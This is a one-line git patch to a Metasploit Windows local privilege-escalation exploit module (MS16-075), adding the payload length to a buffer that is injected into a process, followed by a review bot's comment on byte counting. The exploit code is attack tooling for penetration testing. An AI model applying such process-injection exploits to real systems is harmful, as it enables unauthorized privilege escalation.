From dca99552e62916c16b30e26509a38eb7113af6b9 Mon Sep 17 00:00:00 2001
From: phra
Date: Fri, 11 Jan 2019 16:28:49 +0100
Subject: [PATCH] feat: pass payload length to the dll
---
 modules/exploits/windows/local/ms16_075_reflection_juicy.rb | 1 +
 1 file changed, 1 insertion(+)
diff --git a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
index dac07bf84b..7a5e44b560 100644
--- a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
+++ b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
@@ -169,6 +169,7 @@ class MetasploitModule < Msf::Exploit::Local
 configuration += "#{datastore['RPC_IP']}\x00"
 configuration += "#{datastore['RPC_PORT']}\x00"
 configuration += "#{datastore['DCOM_IP']}\x00"
+ configuration += "#{payload.encoded.length}\x00"
 configuration += payload.encoded
 payload_mem = inject_into_process(process, configuration)
 # invoke the exploit, passing in the address of the payload that
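Review bot: The added length field uses `payload.encoded.length`, which in Ruby counts characters rather than bytes, so it only equals the byte count while the string is binary-encoded. Since the value presumably tells the native side how many bytes follow, `configuration += "#{payload.encoded.bytesize}\x00"` states the intent without depending on the string's encoding. The new field also changes the buffer layout that the DLL parses, and the DLL side is not part of this patch, so the two must be updated together; a comment above the block such as `# layout: NUL-terminated text fields (..., DCOM_IP, payload length in decimal), then the raw payload` would keep that contract visible. The enclosing method starts and ends outside the hunk.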